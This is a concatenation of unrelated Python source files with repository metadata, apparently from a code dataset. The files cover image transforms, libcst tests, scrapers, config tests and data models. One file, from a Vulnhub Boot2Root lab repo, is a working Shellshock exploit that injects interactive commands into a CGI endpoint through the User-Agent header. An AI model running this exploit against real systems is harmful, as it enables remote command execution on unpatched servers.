                                         interpolation=flagval)
                        new_sample[elem] = tmp
                samples.append(new_sample)
            if self.flip:
                # Mirror the most recent sample along the width axis.
                now_sample = samples[-1]
                new_sample = {}
                for elem in now_sample.keys():
                    if 'meta' in elem:
                        # Meta dict is copied so the flip marker does not leak
                        # into the unflipped sample.
                        new_sample[elem] = now_sample[elem].copy()
                        new_sample[elem]['flip'] = True
                        continue
                    tmp = now_sample[elem]
                    tmp = tmp[:, ::-1].copy()
                    new_sample[elem] = tmp
                samples.append(new_sample)
        return samples
@PIPELINES.register()
class MultiNorm(object):
    """Normalize image entries of each sample dict in-place.

    3-D entries are scaled to [0, 1], normalized with ImageNet mean/std, and
    transposed HWC -> CHW. 2-D entries only gain a trailing channel axis.
    Keys containing 'meta' and None values are left untouched.
    """
    def __call__(self, samples):
        mean = (0.485, 0.456, 0.406)
        std = (0.229, 0.224, 0.225)
        for pos, sample in enumerate(samples):
            for key in sample.keys():
                if 'meta' in key:
                    continue
                value = sample[key]
                if value is None:
                    continue
                if value.ndim == 2:
                    value = value[:, :, np.newaxis]
                else:
                    value = value / 255.
                    value -= mean
                    value /= std
                    value = value.transpose((2, 0, 1))
                samples[pos][key] = value
        return samples
| 33.358779 | 74 | 0.462014 |
56898797571ee91b9705014a4713968199acc5eb
| 3,507 |
py
|
Python
|
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | 2 |
2021-12-16T23:06:48.000Z
|
2022-01-31T04:28:54.000Z
|
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | null | null | null |
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | null | null | null |
import unittest
import libcst as cst
from textwrap import dedent
from typing import List
from self_annotation import methods_with_self_annotation, methods_returning_self
from util import statement_to_string
def get_self_annotations(source: str) -> List[str]:
    """Parse *source* and render each method whose self/cls parameter is annotated."""
    module = cst.parse_module(dedent(source))
    methods = methods_with_self_annotation(module)
    return [statement_to_string(method) for method in methods]
def get_methods_returning_self(source: str) -> List[str]:
    """Parse *source* and render each method that returns its self/cls parameter."""
    module = cst.parse_module(dedent(source))
    methods = methods_returning_self(module)
    return [statement_to_string(method) for method in methods]
class SelfAnnotationTest(unittest.TestCase):
    """Unit tests for the self-annotation collectors."""
    def test_self_annotation(self) -> None:
        # Methods with an annotated self/cls are reported; plain self/cls and
        # module-level functions are not.
        self.assertEqual(
            get_self_annotations(
                """
                class Foo:
                    def some_method(self: _T, other: Union[_T, str]) -> bool:
                        print("hello")
                    def some_classmethod(cls: Type[_T], other: int) -> List[_T]: ...
                    def self_not_annotated(self, other: Union[_T, str]) -> bool: ...
                """
            ),
            [
                "def some_method(self: _T, other: Union[_T, str]) -> bool: ...",
                "def some_classmethod(cls: Type[_T], other: int) -> List[_T]: ...",
            ],
        )
        self.assertEqual(
            get_self_annotations(
                """
                class Foo:
                    def some_method(self, other: Union[_T, str]) -> bool: ...
                    def some_method2(cls, other: int) -> List[int]: ...
                    @staticmethod
                    def some_method2(x: int) -> List[int]: ...
                def not_a_method(self: _T, other: Union[_T, str]) -> bool: ...
                """
            ),
            [],
        )
    def test_returns_self(self) -> None:
        # The collector keys on the first parameter being returned, regardless
        # of whether it is literally named self/cls.
        self.assertEqual(
            get_methods_returning_self(
                """
                class Foo:
                    def some_method(self):
                        self.x = 1
                        return self
                    def some_method2(not_called_self):
                        self.x = 1
                        return not_called_self
                    def some_classmethod(cls, x: int):
                        print("hello")
                        return cls(x)
                    def some_classmethod2(not_called_cls, x: int):
                        print("hello")
                        return not_called_cls(x)
                    def no_return_self(self):
                        return 1
                    def no_parameters():
                        return 1
                """
            ),
            [
                "def some_method(self):\n" "    self.x = 1\n" "    return self",
                "def some_method2(not_called_self):\n"
                "    self.x = 1\n"
                "    return not_called_self",
                "def some_classmethod(cls, x: int):\n"
                '    print("hello")\n'
                "    return cls(x)",
                "def some_classmethod2(not_called_cls, x: int):\n"
                '    print("hello")\n'
                "    return not_called_cls(x)",
            ],
        )
        self.assertEqual(
            get_methods_returning_self(
                """
                def not_a_method(self):
                    return self
                """
            ),
            [],
        )
| 31.881818 | 84 | 0.454234 |
d90d433a44d595d1584ff8bf433f06daa6c6113d
| 994 |
py
|
Python
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 43 |
2019-12-10T00:05:51.000Z
|
2022-03-31T21:21:20.000Z
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 5 |
2021-05-09T01:12:31.000Z
|
2022-03-29T17:34:15.000Z
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 14 |
2020-01-13T21:20:07.000Z
|
2022-03-31T02:11:26.000Z
|
######################################################
#
# Generate Harmonics data
#
######################################################
import numpy as np
def generate(sineCoeffArray, sinePeriodsArray, cosineCoeffArray, cosinePeriodsArray, timeSteps, tStart=0):
    """Generate a sum-of-harmonics time series of length timeSteps.

    At time step i the series equals
    sum_j sineCoeff[j] * sin(i * sinePeriod[j] * 2*pi / timeSteps)
    + sum_k cosineCoeff[k] * cos(i * cosinePeriod[k] * 2*pi / timeSteps).
    Samples before tStart are left at zero.

    Raises:
        Exception: when a coefficient list and its period list differ in length.
    """
    if (len(sineCoeffArray) != len(sinePeriodsArray)):
        raise Exception('sineCoeffArray and sinePeriodsArray must be of the same length.')
    if (len(cosineCoeffArray) != len(cosinePeriodsArray)):
        raise Exception('cosineCoeffArray and cosinePeriodsArray must be of the same length.')
    outputArray = np.zeros(timeSteps)
    T = float(timeSteps)
    for i in range(tStart, timeSteps):
        value = 0.0
        # Pair each coefficient with its period instead of indexing by position.
        for coeff, period in zip(sineCoeffArray, sinePeriodsArray):
            value += coeff * np.sin(i * period * 2.0 * np.pi / T)
        for coeff, period in zip(cosineCoeffArray, cosinePeriodsArray):
            value += coeff * np.cos(i * period * 2.0 * np.pi / T)
        outputArray[i] = value
    return outputArray
| 35.5 | 109 | 0.623742 |
794bfb426d52ad43e3e2f35e2437243e352e4c07
| 291 |
py
|
Python
|
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
from pydantic import BaseModel
from datetime import datetime
class PostBase(BaseModel):
    # Fields shared by all post payloads; 'published' defaults to True.
    title: str
    content: str
    published: bool = True
class PostCreate(PostBase):
    # Creation payload: identical to the base fields, kept as a distinct type.
    pass
class Post(PostBase):
    # Response model: base fields plus database-populated columns.
    id: int
    create_at: datetime
    class Config:
        # Allow constructing the model directly from ORM objects.
        orm_mode = True
| 13.857143 | 30 | 0.683849 |
30b1168d544597cb161b7ead4d44f5a53a69f27f
| 2,072 |
py
|
Python
|
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | 1 |
2022-01-28T22:29:44.000Z
|
2022-01-28T22:29:44.000Z
|
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | null | null | null |
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | 1 |
2022-01-28T21:10:41.000Z
|
2022-01-28T21:10:41.000Z
|
import argparse
import requests
from bs4 import BeautifulSoup
import urllib.parse
import re
def main(input_file, output_file):
    """Resolve each Wikipedia path in *input_file* and append found URLs to *output_file*.

    The output file is opened once for the whole run instead of being
    re-opened in append mode for every single hit.
    """
    with open(input_file, "r") as source, open(output_file, "a") as out:
        for line in source:
            url = get_website(line)
            if url:
                print(url)
                out.write(url + "\n")
def get_website(url_path):
    """Fetch the German Wikipedia page at *url_path* and return the last external
    link found in its first table ('' when none), or False on any error.

    Replaces two nearly identical lookup blocks with one loop; "external free"
    is checked last so it overrides "external text", matching the original
    precedence.
    """
    try:
        clean_url_path = url_path.strip()
        print("Start with: " + clean_url_path)
        session = requests.session()
        session.headers[
            "User-Agent"
        ] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
        response = session.get(
            url="https://de.wikipedia.org" + clean_url_path, timeout=3
        )
        session.close()
        soup = BeautifulSoup(response.text, "html.parser")
        url = ""
        table = soup.find("table")
        if table:
            for link_class in ("external text", "external free"):
                link_elements = table.findAll("a", class_=link_class)
                if link_elements:
                    url = link_elements[-1].attrs.get("href")
        return url
    except Exception as e:
        # Broad catch keeps the batch run going; the error is printed and the
        # caller treats the False return as "no URL found".
        print(e)
        return False
if __name__ == "__main__":
    # CLI: -i file of wikipedia paths (one per line), -o file to append URLs to.
    parser = argparse.ArgumentParser(
        description="Check list of strings against wikipedia."
    )
    parser.add_argument("-i", type=str, default="input.txt", help="Path to input file")
    parser.add_argument(
        "-o", type=str, default="output.txt", help="Path to output file"
    )
    args = parser.parse_args()
    main(args.i, args.o)
| 33.967213 | 123 | 0.565637 |
cceb767b76a624c0a5613aa619c966a9f77f41b3
| 581 |
py
|
Python
|
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1 |
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
import xmlrpclib
import argparse
# XML-RPC client for the proxy's control interface (Python 2 module name).
server = xmlrpclib.ServerProxy('http://localhost:8000')
def get_best_public_block_hash():
    # Print the proxy's current best publicly-known block hash.
    print(server.get_best_public_block_hash())
def get_start_hash():
    # Print the block hash the proxy started from.
    print(server.get_start_hash())
# Map CLI command names to the functions above; also drives argparse choices.
FUNCTION_MAP = {
    'get_best_public_block_hash': get_best_public_block_hash,
    'get_start_hash': get_start_hash,
}
parser = argparse.ArgumentParser(description='Execute cli commands against Selfish Mining Proxy.')
parser.add_argument('command', choices=FUNCTION_MAP.keys())
args = parser.parse_args()
func = FUNCTION_MAP[args.command]
func()
| 23.24 | 98 | 0.77969 |
15e3f235200baf05a691bbe46d3344ac787a7e08
| 236 |
py
|
Python
|
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from trap_rain_water import trap
class Test(TestCase):
    def test_trap(self):
        # Classic "Trapping Rain Water" fixtures with known trapped volumes.
        self.assertEqual(trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]), 6)
        self.assertEqual(trap([4, 2, 0, 3, 2, 5]), 9)
ba53812042c8cd49922e9f56094c01118cb404a8
| 383 |
py
|
Python
|
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2022-03-11 06:01
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an 'IP' CharField (empty default) to InnModel for request tracking.
    dependencies = [
        ('inn_check', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='innmodel',
            name='IP',
            field=models.CharField(default='', max_length=30),
        ),
    ]
| 20.157895 | 62 | 0.584856 |
244649b71a831d0866f160585f58c68bfa580954
| 190 |
py
|
Python
|
Backend/tests/test_skeleton.py
|
olivaresf/AWattPrice
|
db50930a016a4263638af64704d3233cc27e142b
|
[
"BSD-3-Clause"
] | 8 |
2020-10-22T14:47:54.000Z
|
2022-01-23T20:17:51.000Z
|
v1_backend/tests/test_skeleton.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 75 |
2020-11-16T16:13:28.000Z
|
2022-03-27T09:45:56.000Z
|
v1_backend/tests/test_skeleton.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 4 |
2020-11-10T21:21:08.000Z
|
2021-10-20T12:35:33.000Z
|
# -*- coding: utf-8 -*-
import pytest
from awattprice.poll import main
# Package metadata generated by the project scaffold.
__author__ = "Frank Becker"
__copyright__ = "Frank Becker"
__license__ = "mit"
def test_nothing():
    """Smoke test: verifies the pytest harness itself runs."""
    assert 1 == 1
| 14.615385 | 32 | 0.705263 |
068472b37a923d39eaa69065bcef300bb0c08538
| 635 |
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
# Download the helper library from https://www.twilio.com/docs/python/install
from twilio.rest import Client
# Account SID and auth token come from twilio.com/console; both are left
# empty in this checked-in copy and must be filled in before running.
account_sid = ''
auth_token = ''
client = Client(account_sid, auth_token)
# Send one test SMS; the 'from_' number must be a Twilio-owned number.
message = client.messages.create(
    body='Hello there This is a test message from twilio!!',
    from_='+99098',
    to='+8'
)
print(message.sid)
| 35.277778 | 96 | 0.629921 |
ccb7138859e0220beed21a63659d150c9301378b
| 2,697 |
py
|
Python
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
import json
"""
This script is used to simplify the process of creating or updating a record in Keylight (v2).
You can add fields in the record as script arguments and/or in the
code. The format for the `kl-create-record` and `kl-update-record` commands are created quickly.
Fill out the args below and add arguments accordingly.
`args` dict contains the record fields you want to create in the component through create/update records.
`lookup_fields` - specifies which fields are lookup fields and what components they are taken from.
Output - locate the json file to create/update your records in `Keylight.JSON`
"""
def main():
    """Build the field-list JSON for kl-create-record / kl-update-record.

    Lookup fields are resolved to record IDs via their source component;
    the result is returned to the war room and stored under Keylight.JSON.
    """
    ##############################################################
    args = {
        # 'field_name': 'field_value',
        'Task ID': demisto.args().get('task_id'),  # Example
        'Audit Project': demisto.args().get('project')  # Example
    }
    lookup_fields = {
        # 'argName': 'componentName',
        'Audit Project': 'Audit Projects'  # Example
    }
    ##############################################################
    components = demisto.executeCommand("kl-get-component", {})[0].get('Contents', {})
    final_json = []
    for field_name in args.keys():
        if field_name in lookup_fields.keys():
            # Lookup field: translate the display value into the record ID
            # of the matching record in the lookup component.
            component_id = get_component_id_by_name(lookup_fields.get(field_name), components)
            records = demisto.executeCommand("kl-get-records", {'component_id': component_id})[0].get('Contents', {})
            lookup_field_id = get_lookup_id(args[field_name], records)
            field = {
                'fieldName': field_name,
                'value': lookup_field_id,
                'isLookup': True
            }
            final_json.append(field)
        else:
            # Plain field: pass the value through unchanged.
            field = {
                'fieldName': field_name,
                'value': args[field_name],
                'isLookup': False
            }
            final_json.append(field)
    return_outputs(json.dumps(final_json, indent=4), {'Keylight.JSON': json.dumps(final_json)}, final_json)
def get_lookup_id(lookup_value, records):
    """Return the ID of the record whose DisplayName equals *lookup_value*.

    Returns -1 when the matching record has no ID; raises ValueError when no
    record matches at all.
    """
    for entry in records:
        if entry.get('DisplayName', '') == lookup_value:
            return entry.get('ID', -1)
    raise ValueError(f"Could not find {lookup_value} in the specified component.")
def get_component_id_by_name(component_name, components):
    """Return the ID of the component whose Name equals *component_name*.

    Returns -1 when the matching component has no ID. Raises ValueError when
    no component matches; the message now names the missing component, for
    consistency with get_lookup_id.
    """
    for component in components:
        if component.get('Name') == component_name:
            return component.get("ID", -1)
    raise ValueError(f"Could not find component {component_name}.")
# Demisto/XSOAR executes scripts with __name__ set to "__builtin__" (Python 2)
# or "builtins" (Python 3), not "__main__".
if __name__ == "__builtin__" or __name__ == "builtins":
    main()
| 35.96 | 117 | 0.609566 |
d1945bdd004e5a11a34f0860b4869f3b06fdd324
| 4,911 |
py
|
Python
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 731 |
2018-06-01T21:48:43.000Z
|
2022-03-29T08:21:42.000Z
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 124 |
2018-06-19T05:59:50.000Z
|
2022-03-31T18:17:59.000Z
|
test/test_config.py
|
st3fan/sphinx-automation-experiment
|
c92c8400770c6c604e2451e4f1e71957fc4c5ef8
|
[
"Apache-2.0"
] | 64 |
2018-06-26T14:12:53.000Z
|
2022-03-20T07:33:33.000Z
|
from pathlib import Path
from unittest.mock import patch
import pytest
import pghoard.config
from pghoard.rohmu.errors import InvalidConfigurationError
from .base import PGHoardTestCase
def make_mock_find_pg_binary(out_command, out_version):
    """Create a find_pg_binary replacement returning a fixed (command, version) pair."""
    def _stub(wanted_program, versions=None, pg_bin_directory=None, check_commands=True):  # pylint: disable=unused-argument
        return out_command, out_version
    return _stub
def make_mock_get_command_version(wanted_version_string):
    """Create a get_command_version replacement that always reports the given version."""
    def _stub(command, can_fail=True):  # pylint: disable=unused-argument
        return wanted_version_string
    return _stub
class TestConfig(PGHoardTestCase):
    """Tests for resolving PostgreSQL binary paths/versions into the config."""
    # Do not use config_template as we want only the minimum to call
    # fill_config_command_paths
    def minimal_config_template(
        self, pg_bin_directory=None, pg_data_directory_version=None, basebackup_path=None, receivexlog_path=None
    ):
        # Build the smallest backup_sites config, including only the keys
        # that were explicitly provided.
        site_config = {
            "active": True,
        }
        if pg_bin_directory:
            site_config["pg_bin_directory"] = pg_bin_directory
        if pg_data_directory_version:
            site_config["pg_data_directory_version"] = pg_data_directory_version
        if basebackup_path:
            site_config["pg_basebackup_path"] = basebackup_path
        if receivexlog_path:
            site_config["pg_receivexlog_path"] = receivexlog_path
        return {"backup_sites": {self.test_site: site_config}}
    def test_valid_bin_directory(self, tmpdir):
        """
        Test a valid bin directory, containing the required programs.
        """
        for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
            dest_path = tmpdir / utility
            # Convert it to a proper Path
            Path(dest_path).touch()
        with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
            assert self._check_all_needed_commands_found(str(tmpdir)) == "13.2"
            config = self.minimal_config_template(str(tmpdir))
            site_config = config["backup_sites"][self.test_site]
            pghoard.config.fill_config_command_paths(config, self.test_site, True)
            # 130002 is the numeric form of version "13.2".
            assert site_config["pg_receivexlog_path"] == tmpdir / "pg_receivewal"
            assert site_config["pg_receivexlog_version"] == 130002
            assert site_config["pg_basebackup_path"] == tmpdir / "pg_basebackup"
            assert site_config["pg_basebackup_version"] == 130002
    def test_specific_pg_version(self, tmpdir):
        # A mismatch between the configured data-directory version and the
        # binaries' version must be rejected.
        for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
            dest_path = tmpdir / utility
            # Convert it to a proper Path
            Path(dest_path).touch()
        with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
            assert self._check_all_needed_commands_found(str(tmpdir)) == "13.2"
            with pytest.raises(InvalidConfigurationError):
                config = self.minimal_config_template(str(tmpdir), pg_data_directory_version="10")
                pghoard.config.fill_config_command_paths(config, self.test_site, True)
            config = self.minimal_config_template(str(tmpdir), pg_data_directory_version="13")
            pghoard.config.fill_config_command_paths(config, self.test_site, True)
    def test_fallback_to_path(self, tmpdir, monkeypatch):
        # When the configured bin directory is unusable, binaries should be
        # located via the PATH environment variable instead.
        for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
            dest_path = tmpdir / utility
            # Convert it to a proper Path
            Path(dest_path).touch()
        monkeypatch.setenv("PATH", str(tmpdir))
        # Add a dummy bin directory so that we don't fallback on versions
        # found in "well known locations"
        config = self.minimal_config_template("/dummy/bin/directory/")
        site_config = config["backup_sites"][self.test_site]
        with patch("pghoard.config.get_command_version", make_mock_get_command_version("13.2")):
            pghoard.config.fill_config_command_paths(config, self.test_site, True)
            assert site_config["pg_receivexlog_path"] == tmpdir / "pg_receivewal"
            assert site_config["pg_receivexlog_version"] == 130002
            assert site_config["pg_basebackup_path"] == tmpdir / "pg_basebackup"
            assert site_config["pg_basebackup_version"] == 130002
    def test_unsupported_pg_version(self, tmpdir):
        # Versions older than the minimum supported one must be rejected.
        for utility in ["postgres", "pg_basebackup", "pg_receivewal"]:
            dest_path = tmpdir / utility
            # Convert it to a proper Path
            Path(dest_path).touch()
        with patch("pghoard.config.get_command_version", make_mock_get_command_version("8.2")):
            config = self.minimal_config_template(str(tmpdir))
            with pytest.raises(InvalidConfigurationError):
                pghoard.config.fill_config_command_paths(config, self.test_site, True)
| 46.330189 | 138 | 0.693545 |
ae8ed3919fe19c84d9de1a7379b5b2c101f5fd33
| 344 |
py
|
Python
|
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 21 |
2016-02-06T14:30:01.000Z
|
2020-09-11T05:39:17.000Z
|
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | null | null | null |
Boot2Root/vulnhub/Sokar/scripts/shellshock.py
|
Kan1shka9/CTFs
|
33ab33e094ea8b52714d5dad020c25730e91c0b0
|
[
"MIT"
] | 7 |
2017-02-02T16:27:02.000Z
|
2021-04-30T17:14:53.000Z
|
import requests
# Interactive Shellshock (CVE-2014-6271) exploitation loop: each entered
# command is injected via a crafted User-Agent header against the CGI target.
while True:
    cmd = input("> ")
    headers = {
        'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; %s' % (cmd)
    }
    print((requests.get('http://192.168.1.31:591/cgi-bin/cat', headers = headers, timeout=5).text).strip())
| 38.222222 | 162 | 0.590116 |
4e8e19eba29b8bcd86296d684bc6d97791e0ab70
| 1,081 |
py
|
Python
|
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/collections/activity.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.activity import ActivityCollection
from onegov.feriennet.policy import ActivityQueryPolicy
from sqlalchemy.orm import joinedload
class VacationActivityCollection(ActivityCollection):
    """Activity collection fixed to the 'vacation' type, restricted by identity."""

    # ``type`` is accepted (and ignored) only to mirror the superclass signature.
    def __init__(self, session, type=None, pages=(0, 0), filter=None,
                 identity=None):
        super().__init__(
            session=session,
            type='vacation',
            pages=pages,
            filter=filter
        )
        self.identity = identity

    @property
    def policy(self):
        """Query policy derived from the current identity."""
        return ActivityQueryPolicy.for_identity(self.identity)

    def query_base(self):
        """Base query limited to activities the policy grants access to."""
        unfiltered = self.session.query(self.model_class)
        return self.policy.granted_subset(unfiltered)

    def transform_batch_query(self, query):
        """Eager-load occasions when fetching a batch."""
        return query.options(joinedload('occasions'))

    def by_page_range(self, page_range):
        """Clone this collection for a different page range, keeping identity/filter."""
        return self.__class__(
            session=self.session,
            identity=self.identity,
            pages=page_range,
            filter=self.filter
        )
0936b2231bbadedf6c7391b32fd6a5ba9146c24d
| 488 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v8_1/removed_report_support_hours.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
    """Migrate references from the removed 'Support Hours' report.

    Repoints auto email reports and custom roles at the replacement
    'Support Hour Distribution' report, then deletes the old report doc.
    """
    renamed = ('Support Hour Distribution', 'Support Hours')
    # Scheduled email reports that referenced the old report name.
    frappe.db.sql(""" update `tabAuto Email Report` set report = %s
        where name = %s""", renamed)
    # Custom role permissions tied to the old report.
    frappe.db.sql(""" update `tabCustom Role` set report = %s
        where report = %s""", renamed)
    # Finally remove the obsolete report document itself.
    frappe.delete_doc('Report', 'Support Hours')
| 34.857143 | 71 | 0.715164 |
eef2f951dda965fa12bea2cadfafa10d8cb185a8
| 409 |
py
|
Python
|
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-model/src/watchmen_model/admin/user_group.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from typing import List
from pydantic import BaseModel
from watchmen_model.common import IndicatorId, OptimisticLock, SpaceId, TenantBasedTuple, UserGroupId, UserId
class UserGroup(TenantBasedTuple, OptimisticLock, BaseModel):
    """A named group of users, associated with spaces and indicators."""
    userGroupId: UserGroupId = None
    name: str = None
    description: str = None
    # Users belonging to this group.
    userIds: List[UserId] = None
    # Spaces associated with this group — presumably access grants; confirm against usage.
    spaceIds: List[SpaceId] = None
    # Indicators associated with this group.
    indicatorIds: List[IndicatorId] = None
| 27.266667 | 109 | 0.794621 |
a303b6f2b7875ec8a36af087bf43217cb4442cb5
| 2,651 |
py
|
Python
|
